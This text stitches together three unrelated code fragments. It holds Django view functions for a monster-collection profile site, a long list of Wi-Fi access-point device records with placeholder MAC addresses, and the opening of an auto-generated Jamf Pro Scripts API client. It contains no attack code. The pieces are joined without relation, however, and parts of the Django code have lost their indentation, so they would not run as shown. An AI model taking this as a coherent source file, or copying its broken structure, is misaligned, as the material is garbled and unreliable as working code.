                        monster_stable[family_name] = []
                    monster_stable[family_name].append(mon)
                # Sort ordered dict alphabetically by family name
                monster_stable = OrderedDict(sorted(monster_stable.items(), key=lambda family:family[0]))
            else:
                return HttpResponseBadRequest('Invalid sort method')
            context['monster_stable'] = monster_stable
            context['box_grouping'] = box_grouping.replace('_', ' ')
            template = 'herders/profile/monster_inventory/box.html'
        return render(request, template, context)
    else:
        return render(request, 'herders/profile/not_public.html', context)
else:
return render(request, 'herders/profile/not_public.html', context)
@username_case_redirect
@login_required
def quick_fodder_menu(request, profile_name):
    """Return the quick-fodder menu snippet as JSON for the profile owner."""
    try:
        summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
    except Summoner.DoesNotExist:
        return HttpResponseBadRequest()
    if not (request.user.is_authenticated and summoner.user == request.user):
        return HttpResponseForbidden()
    template = loader.get_template('herders/profile/monster_inventory/quick_fodder_menu.html')
    return JsonResponse({
        'code': 'success',
        'html': template.render(),
    })
@username_case_redirect
@login_required()
def monster_instance_add(request, profile_name):
    """Add a single MonsterInstance via AJAX; returns JSON with the form or
    the rendered row snippet on success. Only the profile owner may add."""
    try:
        summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
    except Summoner.DoesNotExist:
        return HttpResponseBadRequest()
    is_owner = request.user.is_authenticated and summoner.user == request.user
    if not is_owner:
        return HttpResponseForbidden()
    if request.method == 'POST':
        form = AddMonsterInstanceForm(request.POST or None)
    else:
        # GET: pre-populate the form from the query string.
        form = AddMonsterInstanceForm(initial=request.GET.dict())
    if request.method == 'POST' and form.is_valid():
        # Create the monster instance
        new_monster = form.save(commit=False)
        new_monster.owner = request.user.summoner
        new_monster.save()
        messages.success(request, 'Added %s to your collection.' % new_monster)
        template = loader.get_template('herders/profile/monster_inventory/monster_list_row_snippet.html')
        payload = {
            'code': 'success',
            'instance_id': new_monster.pk.hex,
            'html': template.render({
                'profile_name': profile_name,
                'instance': new_monster,
                'is_owner': is_owner,
            }),
        }
    else:
        # Return form filled in and errors shown
        form.helper.form_action = reverse('herders:monster_instance_add', kwargs={'profile_name': profile_name})
        template = loader.get_template('herders/profile/monster_inventory/add_monster_form.html')
        form_context = {'add_monster_form': form}
        form_context.update(csrf(request))
        payload = {
            'code': 'error',
            'html': template.render(form_context),
        }
    return JsonResponse(payload)
@username_case_redirect
@login_required()
def monster_instance_quick_add(request, profile_name, monster_id, stars, level):
    """Instantly add a fodder MonsterInstance at the given stars/level."""
    return_path = request.GET.get(
        'next',
        reverse('herders:profile_default', kwargs={'profile_name': profile_name})
    )
    try:
        summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
    except Summoner.DoesNotExist:
        return HttpResponseBadRequest()
    # Fetch the monster before the ownership check so an invalid id 404s
    # for non-owners too (same order as before).
    monster_to_add = get_object_or_404(Monster, pk=monster_id)
    if not (request.user.is_authenticated and summoner.user == request.user):
        return HttpResponseForbidden()
    new_monster = MonsterInstance.objects.create(
        owner=summoner,
        monster=monster_to_add,
        stars=int(stars),
        level=int(level),
        fodder=True,
        notes='',
        priority=MonsterInstance.PRIORITY_DONE,
    )
    messages.success(request, 'Added %s to your collection.' % new_monster)
    return redirect(return_path)
@username_case_redirect
@login_required()
def monster_instance_bulk_add(request, profile_name):
    """Bulk-add up to 50 MonsterInstances to a profile via a formset.

    Only the profile owner may use this view. Material-archetype monsters
    are automatically marked PRIORITY_DONE. Blank formset rows are skipped.
    """
    return_path = reverse('herders:profile_default', kwargs={'profile_name': profile_name})
    try:
        summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
    except Summoner.DoesNotExist:
        return HttpResponseBadRequest()
    is_owner = (request.user.is_authenticated and summoner.user == request.user)
    BulkAddFormset = modelformset_factory(
        MonsterInstance,
        form=BulkAddMonsterInstanceForm,
        formset=BulkAddMonsterInstanceFormset,
        extra=5,
        max_num=50,
    )
    if request.method == 'POST':
        formset = BulkAddFormset(request.POST)
    else:
        formset = BulkAddFormset()
    context = {
        # Use the viewed profile's name for consistency with the sibling
        # views (previously this used request.user.username).
        'profile_name': profile_name,
        'return_path': return_path,
        'is_owner': is_owner,
        'bulk_add_formset_action': request.path + '?next=' + return_path,
        'view': 'profile',
    }
    if not is_owner:
        raise PermissionDenied("Trying to bulk add to profile you don't own")
    if request.method == 'POST' and formset.is_valid():
        new_instances = formset.save(commit=False)
        for new_instance in new_instances:
            try:
                if new_instance.monster:
                    new_instance.owner = summoner
                    if new_instance.monster.archetype == Monster.ARCHETYPE_MATERIAL:
                        new_instance.priority = MonsterInstance.PRIORITY_DONE
                    new_instance.save()
                    messages.success(request, 'Added %s to your collection.' % new_instance)
            except ObjectDoesNotExist:
                # Blank form row with no monster selected; skip silently.
                pass
        return redirect(return_path)
    # GET, or POST with validation errors: re-render the formset.
    context['bulk_add_formset'] = formset
    return render(request, 'herders/profile/monster_inventory/bulk_add_form.html', context)
@username_case_redirect
def monster_instance_view(request, profile_name, instance_id):
return_path = request.GET.get(
'next',
request.path
)
try:
summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
except Summoner.DoesNotExist:
return render(request, 'herders/profile/not_found.html')
is_owner = (request.user.is_authenticated and summoner.user == request.user)
context = {
'profile_name': profile_name,
'summoner': summoner,
'return_path': return_path,
'is_owner': is_owner,
'view': 'profile',
}
try:
context['instance'] = MonsterInstance.objects.select_related('monster', 'monster__leader_skill').prefetch_related('monster__skills').get(pk=instance_id)
if context['instance'].owner != summoner:
rev = reverse('herders:monster_instance_view',
kwargs={
"profile_name": context['instance'].owner.user.username,
"instance_id": instance_id,
},
)
return redirect(rev, permanent=True)
except ObjectDoesNotExist:
return render(request, 'herders/profile/monster_view/not_found.html', context)
if is_owner or summoner.public:
| |
"deviceModel":None,
"createDate":"2019-04-08 15:30:09",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23120
],
"topId":22953,
"mac":"A1:A1:A5:A1:B1:86"
},
{
"deviceId":13348,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:09",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23122
],
"topId":22956,
"mac":"A1:A1:A5:A1:B1:87"
},
{
"deviceId":13349,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:09",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23124
],
"topId":22959,
"mac":"A1:A1:A5:A1:B1:88"
},
{
"deviceId":13350,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:09",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23126
],
"topId":22962,
"mac":"A1:A1:A5:A1:B1:89"
},
{
"deviceId":13351,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23128
],
"topId":22965,
"mac":"A1:A1:A5:A1:B1:90"
},
{
"deviceId":13352,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23130
],
"topId":22968,
"mac":"A1:A1:A5:A1:B1:91"
},
{
"deviceId":13354,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23134
],
"topId":22944,
"mac":"A1:A1:A5:A1:B1:93"
},
{
"deviceId":13355,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23136
],
"topId":22947,
"mac":"A1:A1:A5:A1:B1:94"
},
{
"deviceId":13356,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23138
],
"topId":22950,
"mac":"A1:A1:A5:A1:B1:95"
},
{
"deviceId":13357,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23140
],
"topId":22953,
"mac":"A1:A1:A5:A1:B1:96"
},
{
"deviceId":13358,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23142
],
"topId":22956,
"mac":"A1:A1:A5:A1:B1:97"
},
{
"deviceId":13359,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23144
],
"topId":22959,
"mac":"A1:A1:A5:A1:B1:98"
},
{
"deviceId":13360,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23146
],
"topId":22962,
"mac":"A1:A1:A5:A1:B1:99"
},
{
"deviceId":13361,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23148
],
"topId":22965,
"mac":"A1:A1:A5:A1:C1:01"
},
{
"deviceId":13362,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23150
],
"topId":22968,
"mac":"A1:A1:A5:A1:C1:02"
},
{
"deviceId":13364,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22946
],
"topId":22944,
"mac":"A1:A1:A5:A1:C1:04"
},
{
"deviceId":13365,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22949
],
"topId":22947,
"mac":"A1:A1:A5:A1:C1:05"
},
{
"deviceId":13366,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22952
],
"topId":22950,
"mac":"A1:A1:A5:A1:C1:06"
},
{
"deviceId":13367,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22955
],
"topId":22953,
"mac":"A1:A1:A5:A1:C1:07"
},
{
"deviceId":13368,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22958
],
"topId":22956,
"mac":"A1:A1:A5:A1:C1:08"
},
{
"deviceId":13369,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22961
],
"topId":22959,
"mac":"A1:A1:A5:A1:C1:09"
},
{
"deviceId":13370,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22964
],
"topId":22962,
"mac":"A1:A1:A5:A1:C1:10"
},
{
"deviceId":13371,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22967
],
"topId":22965,
"mac":"A1:A1:A5:A1:C1:11"
},
{
"deviceId":13372,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22970
],
"topId":22968,
"mac":"A1:A1:A5:A1:C1:12"
},
{
"deviceId":13374,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22974
],
"topId":22944,
"mac":"A1:A1:A5:A1:C1:14"
},
{
"deviceId":13375,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22976
],
"topId":22947,
"mac":"A1:A1:A5:A1:C1:15"
},
{
"deviceId":13376,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22978
],
"topId":22950,
"mac":"A1:A1:A5:A1:C1:16"
},
{
"deviceId":13377,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22980
],
"topId":22953,
"mac":"A1:A1:A5:A1:C1:17"
},
{
"deviceId":13378,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22982
],
"topId":22956,
"mac":"A1:A1:A5:A1:C1:18"
},
{
"deviceId":13379,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22984
],
"topId":22959,
"mac":"A1:A1:A5:A1:C1:19"
},
{
"deviceId":13380,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22986
],
"topId":22962,
"mac":"A1:A1:A5:A1:C1:20"
},
{
"deviceId":13381,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22988
],
"topId":22965,
"mac":"A1:A1:A5:A1:C1:21"
},
{
"deviceId":13382,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22990
],
"topId":22968,
"mac":"A1:A1:A5:A1:C1:22"
},
{
"deviceId":13384,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22994
],
"topId":22944,
"mac":"A1:A1:A5:A1:C1:24"
},
{
"deviceId":13385,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22996
],
"topId":22947,
"mac":"A1:A1:A5:A1:C1:25"
},
{
"deviceId":13386,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22998
],
"topId":22950,
"mac":"A1:A1:A5:A1:C1:26"
},
{
"deviceId":13387,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23000
],
"topId":22953,
"mac":"A1:A1:A5:A1:C1:27"
},
{
"deviceId":13388,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23002
],
"topId":22956,
"mac":"A1:A1:A5:A1:C1:28"
},
{
"deviceId":13389,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23004
],
"topId":22959,
"mac":"A1:A1:A5:A1:C1:29"
},
{
"deviceId":13437,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23100
],
"topId":22953,
"mac":"A1:A1:A5:A1:C1:77"
},
{
"deviceId":13438,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23102
],
"topId":22956,
"mac":"A1:A1:A5:A1:C1:78"
},
{
"deviceId":13439,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23104
],
"topId":22959,
"mac":"A1:A1:A5:A1:C1:79"
},
{
"deviceId":13440,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23106
],
"topId":22962,
"mac":"A1:A1:A5:A1:C1:80"
},
{
"deviceId":13441,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23108
],
"topId":22965,
"mac":"A1:A1:A5:A1:C1:81"
},
{
"deviceId":13442,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23110
],
"topId":22968,
"mac":"A1:A1:A5:A1:C1:82"
},
{
"deviceId":13444,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:16",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23114
],
"topId":22944,
"mac":"A1:A1:A5:A1:C1:84"
},
{
"deviceId":13445,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:17",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23116
],
"topId":22947,
"mac":"A1:A1:A5:A1:C1:85"
},
{
"deviceId":13446,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:17",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23118
],
"topId":22950,
"mac":"A1:A1:A5:A1:C1:86"
},
{
"deviceId":13459,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:17",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23144
],
"topId":22959,
"mac":"A1:A1:A5:A1:C1:99"
},
{
"deviceId":13460,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23146
],
"topId":22962,
"mac":"A1:A1:A5:A1:D1:01"
},
{
"deviceId":13461,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23148
],
"topId":22965,
"mac":"A1:A1:A5:A1:D1:02"
},
{
"deviceId":13462,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23150
],
"topId":22968,
"mac":"A1:A1:A5:A1:D1:03"
},
{
"deviceId":13464,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22946
],
"topId":22944,
"mac":"A1:A1:A5:A1:D1:05"
},
{
"deviceId":13465,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22949
],
"topId":22947,
"mac":"A1:A1:A5:A1:D1:06"
},
{
"deviceId":13466,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22952
],
"topId":22950,
"mac":"A1:A1:A5:A1:D1:07"
},
{
"deviceId":13467,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22955
],
"topId":22953,
"mac":"A1:A1:A5:A1:D1:08"
},
{
"deviceId":13468,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22958
],
"topId":22956,
"mac":"A1:A1:A5:A1:D1:09"
},
{
"deviceId":13469,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22961
],
"topId":22959,
"mac":"A1:A1:A5:A1:D1:10"
},
{
"deviceId":13470,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22964
],
"topId":22962,
"mac":"A1:A1:A5:A1:D1:11"
},
{
"deviceId":13471,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22967
],
"topId":22965,
"mac":"A1:A1:A5:A1:D1:12"
},
{
"deviceId":13472,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:18",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22970
],
"topId":22968,
"mac":"A1:A1:A5:A1:D1:13"
},
{
"deviceId":13244,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:00",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23114
],
"topId":22944,
"mac":"A1:A1:A5:A1:A1:82"
},
{
"deviceId":13245,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23116
],
"topId":22947,
"mac":"A1:A1:A5:A1:A1:83"
},
{
"deviceId":13246,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23118
],
"topId":22950,
"mac":"A1:A1:A5:A1:A1:84"
},
{
"deviceId":13247,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23120
],
"topId":22953,
"mac":"A1:A1:A5:A1:A1:85"
},
{
"deviceId":13248,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23122
],
"topId":22956,
"mac":"A1:A1:A5:A1:A1:86"
},
{
"deviceId":13249,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23124
],
"topId":22959,
"mac":"A1:A1:A5:A1:A1:87"
},
{
"deviceId":13250,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:01",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23126
],
"topId":22962,
"mac":"A1:A1:A5:A1:A1:88"
},
{
"deviceId":13251,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23128
],
"topId":22965,
"mac":"A1:A1:A5:A1:A1:89"
},
{
"deviceId":13252,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23130
],
"topId":22968,
"mac":"A1:A1:A5:A1:A1:90"
},
{
"deviceId":13254,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23134
],
"topId":22944,
"mac":"A1:A1:A5:A1:A1:92"
},
{
"deviceId":13255,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23136
],
"topId":22947,
"mac":"A1:A1:A5:A1:A1:93"
},
{
"deviceId":13256,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23138
],
"topId":22950,
"mac":"A1:A1:A5:A1:A1:94"
},
{
"deviceId":13257,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:02",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23140
],
"topId":22953,
"mac":"A1:A1:A5:A1:A1:95"
},
{
"deviceId":13258,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:03",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23142
],
"topId":22956,
"mac":"A1:A1:A5:A1:A1:96"
},
{
"deviceId":13259,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:03",
"remark":"",
"isOnline":False,
| |
# coding: utf-8
"""
Jamf Pro API
## Overview This is a sample Jamf Pro server which allows for usage without any authentication. The Jamf Pro environment which supports the Try it Out functionality does not run the current beta version of Jamf Pro, thus any newly added endpoints will result in an error and should be used soley for documentation purposes. # noqa: E501
The version of the OpenAPI document: 10.25.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from jamf.api_client import ApiClient
from jamf.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class ScriptsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def v1_scripts_get(self, **kwargs): # noqa: E501
"""Search for sorted and paged Scripts # noqa: E501
Search for sorted and paged scripts # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_scripts_get(async_req=True)
>>> result = thread.get()
:param page:
:type page: int
:param page_size:
:type page_size: int
:param sort: Sorting criteria in the format: property:asc/desc. Default sort is name:asc. Multiple sort criteria are supported and must be separated with a comma. Fields allowed in the query: `id`, `name`, `info`, `notes`, `priority`, `categoryId`, `categoryName`, `parameter4` up to `parameter11`, `osRequirements`, `scriptContents`. Example: sort=date:desc,name:asc
:type sort: list[str]
:param filter: Query in the RSQL format, allowing to filter scripts collection. Default search is empty query - returning all results for the requested page. Fields allowed in the query: `id`, `name`, `info`, `notes`, `priority`, `categoryId`, `categoryName`, `parameter4` up to `parameter11`, `osRequirements`, `scriptContents`. This param can be combined with paging and sorting. Example: filter=categoryName==\"Category\" and name==\"*script name*\"
:type filter: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
